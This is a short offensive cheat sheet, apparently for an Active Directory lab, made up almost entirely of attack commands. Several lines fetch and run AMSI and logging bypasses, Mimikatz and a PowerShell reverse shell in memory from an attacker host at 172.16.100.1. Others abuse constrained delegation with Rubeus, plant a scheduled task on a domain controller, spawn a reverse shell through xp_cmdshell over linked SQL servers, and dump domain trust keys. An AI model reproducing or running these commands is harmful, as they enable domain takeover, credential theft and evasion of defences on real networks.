PowerShell Scripts Memory Injection

iex(iwr http://172.16.100.1/sbloggingbypass.txt -UseBasicParsing);iex(iwr http://172.16.100.1/amsibypass.txt -UseBasicParsing);iex(iwr http://172.16.100.1/Invoke-MimiEx.ps1 -UseBasicParsing)

Constrained Delegation

.\Rubeus.exe s4u /user: /aes256: /impersonateuser:Administrator /msdsspn: /altservice:host /nowrap /ptt

Task Scheduling

schtasks /create /S finance-dc.finance.corp /SC Weekly /RU "finance\Administrator" /TN "STCheck" /TR "powershell.exe -c 'iex(iwr http://172.16.100.1/sbloggingbypass.txt -UseBasicParsing);iex(iwr http://172.16.100.1/amsibypass.txt -UseBasicParsing);iex(iwr http://172.16.100.1/Invoke-PowerShellTcp.ps1 -UseBasicParsing)'"

Running Scheduled Task

schtasks /Run /S finance-dc.finance.corp /TN "STCheck"

Checking MSSQL Availability

Get-SQLInstanceDomain -Verbose

Checking MSSQL Access

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Crawling Database Links

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose

MSSQL Reverse Shell

Get-SQLServerLinkCrawl -Instance dbserver31 -Query 'exec master..xp_cmdshell ''powershell -c "iex(iwr http://172.16.100.1/sbloggingbypass.txt -UseBasicParsing);iex(iwr http://172.16.100.1/amsibypass.txt -UseBasicParsing);iex(iwr http://172.16.100.1/Invoke-PowerShellTcp.ps1 -UseBasicParsing)"''' -QueryTarget dbserver31

Dumping Trust Keys

.\BetterSafetyKatz.exe '"lsadump::trust /patch"' "exit"

Forging Ticket As Enterprise Administrator (the sid value is the current domain's SID; the sids value is the forest root domain's SID)